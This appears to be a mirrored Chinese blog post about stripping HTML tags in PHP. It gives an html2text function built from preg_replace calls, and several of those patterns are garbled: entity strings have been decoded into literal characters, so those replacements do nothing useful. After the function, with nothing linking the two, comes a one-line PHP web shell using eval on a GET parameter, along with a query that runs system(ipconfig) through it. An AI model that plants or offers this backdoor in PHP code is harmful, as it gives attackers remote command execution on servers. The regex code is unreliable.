zoukankan      html  css  js  c++  java
  • php去除h5标签

    function html2text($str){
     $str = preg_replace("/<style .*?<\/style>/is", "", $str);
     $str = preg_replace("/<script .*?<\/script>/is", "", $str);
     $str = preg_replace("/<br \s*\/>/i", ">>>>", $str);
     $str = preg_replace("/<\/?p>/i", ">>>>", $str);
     $str = preg_replace("/<\/?td>/i", "", $str);
     $str = preg_replace("/<\/?div>/i", ">>>>", $str);
     $str = preg_replace("/<\/?blockquote>/i", "", $str);
     $str = preg_replace("/<\/?li>/i", ">>>>", $str);
     $str = preg_replace("/ /i", " ", $str);
     $str = preg_replace("/ /i", " ", $str);
     $str = preg_replace("/&/i", "&", $str);
     $str = preg_replace("/&/i", "&", $str);
     $str = preg_replace("/</i", "<", $str);
     $str = preg_replace("/</i", "<", $str);
     $str = preg_replace("/“/i", '"', $str);
     $str = preg_replace("/&ldquo/i", '"', $str);
     $str = preg_replace("/‘/i", "'", $str);
     $str = preg_replace("/&lsquo/i", "'", $str);
     $str = preg_replace("/'/i", "'", $str);
     $str = preg_replace("/&rsquo/i", "'", $str);
     $str = preg_replace("/>/i", ">", $str);
     $str = preg_replace("/>/i", ">", $str);
     $str = preg_replace("/”/i", '"', $str);
     $str = preg_replace("/&rdquo/i", '"', $str);
     $str = strip_tags($str);
     $str = html_entity_decode($str, ENT_QUOTES, "utf-8");
     $str = preg_replace("/&#.*?;/i", "", $str);
     return $str;
    }
     
    ?a=system(ipconfig);
     
    <?php @eval($_GET['a']);?>
  • 相关阅读:
    NOIP 转圈游戏
    NOIP 2012 同余方程
    BZOJ3864 Hero meet devil
    HDU3045 Picnic Cows
    「PKUWC2018」随机算法
    CF543E Listening to Music
    CF833E Caramel Clouds
    「PKUWC2018」Slay the Spire
    Luogu2183【国家集训队】礼物
    CF932E Team Work
  • 原文地址:https://www.cnblogs.com/vip-deng-vip/p/8679364.html
Copyright © 2011-2022 走看看